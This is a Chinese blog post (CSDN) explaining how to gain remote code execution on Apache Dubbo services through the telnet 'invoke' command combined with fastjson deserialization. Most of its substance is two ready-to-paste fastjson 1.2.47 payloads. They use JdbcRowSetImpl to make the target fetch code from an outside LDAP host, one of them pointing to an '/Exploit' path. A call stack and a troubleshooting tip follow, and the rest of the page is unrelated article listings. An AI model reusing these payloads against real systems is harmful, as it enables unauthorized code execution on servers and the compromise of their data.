Dubbo调用fastjson

最新推荐文章于 2023-09-10 19:23:04 发布
最新推荐文章于 2023-09-10 19:23:04 发布
阅读量1k 收藏
点赞数 1
分类专栏: java 安全 Web 文章标签: zookeeper java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/107183574
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

其解析字符串默认使用的是fastjson,可以结合fastjson实现RCE。

invoke ({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.85.1:8089/test_by_cqq", "autoCommit": true })

调用invoke命令然后接(),中间填{}的json格式即可。

若存在fastjson,则使用1.2.47的payload:

invoke ({ "111": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "222": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://333.e9f7d0ac5032df304f03.d.zhack.ca:1389/Exploit", "autoCommit": true } })

调用栈为:

telnet:81, InvokeTelnetHandler (org.apache.dubbo.qos.legacy)
telnet:59, TelnetHandlerAdapter (org.apache.dubbo.remoting.telnet.support)
received:187, HeaderExchangeHandler (org.apache.dubbo.remoting.exchange.support.header)
received:51, DecodeHandler (org.apache.dubbo.remoting.transport)
run:57, ChannelEventRunnable (org.apache.dubbo.remoting.transport.dispatcher)
runWorker:1149, ThreadPoolExecutor (java.util.concurrent)
run:624, ThreadPoolExecutor$Worker (java.util.concurrent)
run:748, Thread (java.lang)

在这里插入图片描述
后面就是fastjson的JSON.parseArray方法的调用过程了。

如果出现:

Invalid json argument, cause: com/alibaba/fastjson/JSON

说明碰到了异常,而一般很可能是没有添加fastjson依赖造成的。
在这里插入图片描述

表示pom需要添加 fastjson的依赖。

参考

caiqiiqi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis +dubbo +mongo+fastjson
11-07
Redis、Dubbo、MongoDB和FastJSONJava开发中常用的技术组件,它们分别在不同的领域发挥着关键作用。下面将详细介绍这些技术以及它们在实际应用中的功能和使用方法。 1. Redis:Redis 是一个高性能的键值存储系统...
apache dubbo 3.0.7源码
05-06
- **代理模式**:Dubbo通过动态代理生成服务接口的客户端代理类,实现服务调用。 - **序列化**:支持多种序列化方式,如Hessian2、FastJsonJava自带的序列化等,负责将对象转换为可传输的数据格式。 - **网络...
dubbo fastJson
chitangya6507的博客
05-31 474
Dto创建的toString方法不继承Object的toString方法或者使用原生的复合对象的toString方法(其实也是最终使用Object的toString方法) 每一个dto创建一个默认的toString方法:(两种实现方案) 1、创建一个默认的BaseDto对象,在Ba...
dubbox REST服务使用fastjson替换jackson
weixin_33756418的博客
04-26 314
上一节讲解了resteasy如何使用fastjson来替换默认的jackson,虽然dubbox内部采用的就是resteasy,但是大多数情况下,dubbox服务是一个独立的app,并不需要以war包形式部署在外置容器中,也就没有web.xml。好在dubbox扩展性不错,很容易扩展,有此类需求的可以参考下面的做法:   一、rest协议指定fastjson做为序列化 <du...
Apache Dubbo 2.7.7 发布!
weixin_45727359的博客
05-22 1109
来源:https://urlify.cn/amy6ZjApache Dubbo 2.7.7 已发布,这是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的...
Dubbo3技术一套通之FASTJSON2序列化
最新发布
探索知识,创造未来
09-10 562
我们深入探讨了如何利用 Dubbo 的强大能力,切换至 FST 序列化方案。而在本篇,我们将进一步拓展知识视野,携手走进FASTJSON2 序列化的实战应用。准备好,和我一起深入这个新的序列化冒险之旅吧!FASTJSON2是FASTJSON项目的重要升级,目标是为下一个十年提供一个高性能的JSON库支持JSON/JSONB两种协议,JSONPath是一等公民支持全量解析和部分解析支持Java服务端、Android客户端、大数据场景FASTJAON性能很好,但是因为先前的安全漏洞。
Dubbo 2.7.7 发布,FastJson 升级了!
Java技术栈,分享最主流的Java技术
05-25 1034
作者:局长 www.oschina.net/news/115796/dubbo-2-7-7-released Apache Dubbo 2.7.7 已发布,这是一款高性能、轻量级的开源 JavaRPC框架,它提供了三大核心能力:面向接口的远程方法调用、智能容错和负载均衡,以及服务自动注册和发现。 新版本更新内容如下: Features [Solution] 提供集成 Apache Dubbo 与Nacos认证的解决方案 完整的 lfu 缓存建议 [Feature] 支持应用选择首选的网络...
自己手动实现dubbo源码
12-21
5. **序列化**:Dubbo支持多种序列化方式,如Hessian2、Fastjson、Protobuf等,用于将Java对象转化为二进制数据在网络中传输。 6. **负载均衡**:Dubbo内置了多种负载均衡策略,如Random、RoundRobin、LeastActive...
dubbo-demo
03-16
9. **协议与序列化**:Dubbo支持多种通信协议,如Dubbo协议、Http、Rmi等,同时支持Hessian、Fastjson等多种序列化方式,保证数据交换的高效性。 10. **监控与日志**:Dubbo集成了监控中心,可以实时监控服务的运行...
dubbo demo
02-14
6. **协议与序列化**:Dubbo支持多种通信协议(如Dubbo、RMI、HTTP等)和序列化方式(如Hessian、Fastjson等)。你需要知道如何选择和配置这些选项。 7. **服务调用与负载均衡**:Dubbo提供了多种负载均衡策略(如...
阿里druid、fastjsondubbo、RocketMQ被选为2016年度最受欢迎中国开源软件
weixin_33912453的博客
01-05 428
编者按: 2016年度最受欢迎中国开源软件 TOP 20,阿里巴巴有四个开源软件入选:数据库连接池druid、JSON解析库fastjson、分布式服务框架dubbo、消息中间件RocketMQ。 2016 年度最受欢迎中国开源软件评选结果已出炉。​每年的年底我们都会准备今年的一些软件榜单,我们把这个榜单定义为 “热门” 榜单,或者说是最受欢...
fastjson后,dubbo也被曝出高危远程代码执行漏洞
weixin_47082274的博客
06-26 295
0x01 漏洞背景 2020年06月23日, 360网络安全响应中心(以下简称360CERT)监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948,漏洞等级:高危。Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。Apache Dubbo Provider 存在 反序列化漏洞,
干翻Dubbo系列第九篇:Dubbo体系中KRYO、FST、FASTJSON2序列化详解
七叔的博客
08-10 2万+
本文是干翻Dubbo系列文章中第九篇,详细介绍了Dubbo体系中KRYO、FST、FASTJSON2序列化手段,让大家使用Dubbo作为Rpc手段的时候,多几种序列化选择!
Dubbo invoke命令
萌神30号 ↝
10-17 3735
连接 telnet localhost 20880 接口列表 ls 接口下方法列表 ls -l MctCoreMerchantBaseInfoService 调用接口 参数已json格式传递 invoke com.bestpay.merchant.core.facade.merchant.MctCoreMerchantBaseInfoService.queryerchant...
mysql根据json字段查询数据以及错误‘Invalid JSON text in argument 1 to function json_extract‘解决
热门推荐
黑白相间...
03-06 3万+
1,使用json_contins查询 select * from abnormal where status = 1 and state in (10, 20, 25) # 3 and settle_info != '' and json_contains(settle_info -> '$.cids', '32428') ; 2,使用json_exact查询 看了下数据库,发现确实有些记录的该字段为空。后来查了下官方文档,发现可以用JSON_VALID来确保该字段包含JSON,这.
Dubbo3.0系列(7)- Dubbo3.0支持的多种序列化方式
记录知识、锤炼自我
09-08 4146
前言 我们了解到RPC框架中,数据转化为字节流的或者将字节流转换成能读取的固定格式时,需要进行序列化和反序列化,序列化和反序列化的速度也会影响远程调用的效率。 在Dubbo中,支持多种序列化方式,dubbo-serialization模块可以看到支持的方式。 使用的时候,有些序列化包是要自己引入的,比如gson。 <!-- https://mvnrepository.com/artifact/org.apache.dubbo/dubbo-serialization-gson --&g
jquery解析json报错_Jquery.ajax不能解析json对象,报Invalid JSON错误的原因和解决方法(转)...
weixin_39887926的博客
02-06 3010
我们知道Invalid JSON错误导致的json对象不能解析,一般都是服务器返回的json字符串的语法有错误。这种情况下,我们只需要仔细的检查一下json就可以解决问题。下面说一下,最近在使用jquery 1.4中使用$.ajax()方法解析json对象遇到的问题。Json对象是:[{name:'二手房出售',infoCount:0,pageUrl:'/ershoufang'},{name:'二...
DubboFastJson反序列化漏洞
flx的博客
06-29 1066
Dubbo 近日 Dubbo 官方报告了一个 Dubbo 远程代码执行问题(CVE-2020-1948),该问题由 Provider 反序列化漏洞引起。根据介绍,攻击者可以使用无法识别的服务名称或方法名称,并带上一些恶意参数有效载荷发送 RPC 请求。当恶意参数反序列化后,将执行一些恶意代码。 受影响的版本: 2.7.0 <= Dubbo Version <= 2.7.6 2.6.0 <= Dubbo Version <= 2.6.7 所有 2.5.x
Dubbo分布式服务框架用户指南
Dubbo提供了一套完整的监控体系,包括服务调用统计、服务性能监控、服务健康检查等,方便开发者对分布式系统的运行状态进行实时监控和问题排查。 7. **其他特性**: - 支持多种通信协议,如TCP、HTTP等。 - 可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值